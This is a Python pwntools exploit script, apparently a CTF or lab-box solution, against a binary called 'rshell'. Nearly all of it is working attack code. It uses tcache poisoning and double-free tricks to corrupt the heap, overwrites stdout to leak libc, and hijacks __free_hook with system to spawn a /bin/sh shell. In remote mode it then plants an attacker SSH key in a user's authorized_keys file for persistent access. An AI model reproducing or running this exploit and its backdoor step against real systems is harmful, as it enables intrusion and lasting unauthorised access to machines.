#!/usr/bin/env python3 import pdb from pwn import * prompt = '$ ' def ls(): p.sendline('ls') res = p.recvuntil(prompt) for line in res.split(b'\n')[:-1]: print(line.decode()) def add(name, size, content='x'): p.sendline(f'add {name}') res = p.recvuntil(('size: ', prompt)) if res.endswith(prompt.encode()): pdb.set_trace() return p.sendline(f'{size}') if size > 0: p.recvuntil('content: ') p.sendline(content) res = p.recvuntil(prompt) return res def rm(name, wait=True): p.sendline(f'rm {name}') if wait: p.recvuntil(prompt) def edit(name, size, content='x'): p.sendline(f'edit {name}') res = p.recvuntil(('size: ', prompt)) if res == prompt: pdb.set_trace() return p.sendline(f'{size}') if size > 0: p.recvuntil('content: ') p.send(content) p.recvuntil(prompt) rshell = ELF('./rshell') libc = ELF('./libc.so.6-ropetwo') if args.REMOTE: remote = ssh(host='', user='chromeuser', keyfile='/root/keys/ed25519_gen') while True: if args.REMOTE: p = remote.run('rshell') else: p = process('./rshell') p.recvuntil('$ ') # Create overlaps for end add('A', 0x40, p64(0)*5 + p64(0x61) + p64(0)) # A at 260 in f1 add('B', 0x40) # B at 2b0 in f2 rm('A') # A in 0x50 tcache, f1 empty edit('B', 0) # B -> A in 0x50 tcache, f2 still B add('B2', 0x40) # A in 0x50 tcache, f1 & f2 -> B rm('B') # B -> A in 0x50 tcache, f1 -> B edit('B2', 0x40, '\x90') # B -> fake1 in 0x50 tcache, f1 -> B add('B3', 0x40) # fake in 0x50 tcache, f2 -> B edit('B3', 0x20) # B-end in 0x20 tcache rm('B3') # B in 0x30 tcache add('fake1', 0x40, p64(0)*3 + p64(0x51) + p64(0)) rm('fake1') rm('B2') add('x', 0x30) # add for spacing rm('x') add('C', 0x60) # create block to be freed and steal pointer in tcache - C = 340 add('D', 0x70, p64(0)*5 + p64(0xa1) + p64(0)) # create block and fake block to put fake block meta in place - D = 3b0 rm('D') # D in tcache 0x80 add('E', 0x60, p64(0x21)*11) # create second 0x60, E, and spray with 0x21 for next block meta fake later, E = 430 rm('C') # f1 empty, C in 0x70 tcache edit('E', 0) # slot 2 -> E, E->C in 0x70 tcache add('E2', 0x60) # slots 1 and 2 -> E, C in 0x70 tcache rm('E') # slot 1 -> E, E -> C in 0x70 tache edit('E2', 0x60, b'\xe0') # edit tcache pointer, C -> fake2 in 0x70 tcache # next three fetch C from tcache, and get rid of it without putting it back in 0x70 tcache add('E3', 0x60) # fetch E, fake in 0x70 tcache edit('E3', 0x20) # E-end in 0x30 tcache rm('E3') # E in 0x50 tcache add('fake2', 0x60, p64(0)*9 + p64(0x31) + p64(0)) # get fake block, change key for E rm('E2') # C add('B', 0x70) # B # free fake to fill tcache, then overwrite key protecting from double free for i in range(7): edit('fake2', 0x0) # free fake block, put 2f0 in 0x90 tcache edit('B', 0x70, p64(0)*5 + p64(0xa1) + p64(0) + chr(i).encode()) # B rm('B') # B rm('fake2') # modify libc address add('B', 0x70) edit('B', 0x70, p64(0)*5 + p64(0xa1) + b"\x60\x47") rm('B') add('F', 0x30) # fetch 460 chunk from tcache, 300 still in 0x40 tcache edit('F', 0) # 460 -> 300 in 0x40 tcache, f1 -> 460 add('F2', 0x30) # f1 and f2 -> 460, 300 in 0x40 tcache rm('F') # f2 -> 460, 460 -> 300 in 0x40 tcache edit('F2', 0x30, '\xe0') # 460 -> 3e0 -> stdout in 0x40 tcache # get 460 from tcahce, shrink it, and release it add('F3', 0x30) edit('F3', 0x10) rm('F3') # get 3e0 from tcache, shrink it, and release it add('fake3', 0x30) edit('fake3', 0x10) rm('fake3') # clean up F2 edit('F2', 0x10, p64(0)*2) # overwrtie pointer and key to allow double free rm('F2') try: leak = add('stdout', 0x30, p64(0xfbad1800) + p64(0)*2 + b"\x00"*7) if b'\x7f' not in leak: log.failure("Failed") else: break except EOFError: log.failure("Failed") leaked_addr = u64(leak[8:16]) log.success(f'Leaked address: 0x{leaked_addr:x}') libc.address = leaked_addr - 0x1e7570 log.success(f'Libc base: 0x{libc.address:x}') log.info("Overwriting __free_hook") add('K', 0x50, p64(0)*3 + p64(0x51) + p64(libc.symbols['__free_hook']-8)) # add free hook to tcache 0x50 rm('K') # free file # clear from tcache with add, shrink, rm add('J', 0x40) edit('J', 0x10) rm('J') add('hook', 0x40, b"/bin/sh\x00" + p64(libc.symbols['system'])) log.info("Triggering shell") rm('hook', wait=False) if args.REMOTE: p.sendline('echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDIK/xSi58QvP1UqH+nBwpD1WQ7IaxiVdTpsg5U19G3d nobody@nothing" > /home/r4j/.ssh/authorized_keys') p.sendline("chmod 600 /home/r4j/.ssh/authorized_keys") log.success("Wrote SSH key to /home/r4j/.ssh/authorized_keys") p.interactive()